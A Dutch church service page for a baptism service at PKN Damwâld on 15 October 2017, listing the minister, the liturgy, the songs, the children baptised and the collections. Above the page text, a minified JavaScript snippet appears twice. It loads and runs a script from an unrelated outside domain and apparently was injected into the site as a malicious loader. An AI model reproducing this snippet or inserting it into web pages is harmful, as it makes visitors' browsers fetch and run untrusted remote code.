;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 15 oktober 2017 9:30 uur - PKN Damwâld
zondag 15 oktober 2017
09:30 uur
Heilige doop Ilmar, Marije Sietske en Marie

Kerkdienst zondag 15 oktober 2017 9:30 uur

Thema: Doopviering "God telt mee"

Informatie

Voorganger:Ds. G. Timmer, Twijzelerheide
Organist:Jaap van der Horn
Thema:Doopviering "God telt mee"
Mededeling:Heilige doop Ilmar, Marije Sietske en Marie
Liturgie
Lied voor de dienst ELB 218: 1 en 3
Welkom en mededelingen
Intochtslied ELB 327a
Stil gebed, bemoediging en groet
We zingen: Opwekking 599
Apostolische Geloofsbelijdenis
We zingen: ELB 278: 1 en 2
Lezen van het onderwijs uit het doopformulier
Gebed
Beantwoording van de doopvragen
Dooplied Sjongend op Wei 161: 1, 2, 3 en 4 + refrein
Doop
Bediening van de doop aan:
Marie Westra
Ilmar van Hijum
Marije Sietske van der Kooi
(eerst bediening doop; direct daarna aansteken doopkaars)
Toezingen : Psalm 87: 3
Gesprekje met de kinderen over tellen
We lezen: Psalm 87 en Lukas 18: 15-17
We zingen: ELB 226
Verkondiging: God telt mee
We zingen: God kent jou vanaf het begin
Dankgebed en voorbeden
Collecte
Slotlied Psalm 150: 1 en 2
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: De Ikker Hearewei 1, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: St Gave
Tweede collecte: Kerk
Uitganscollecte: Werelddiaconaat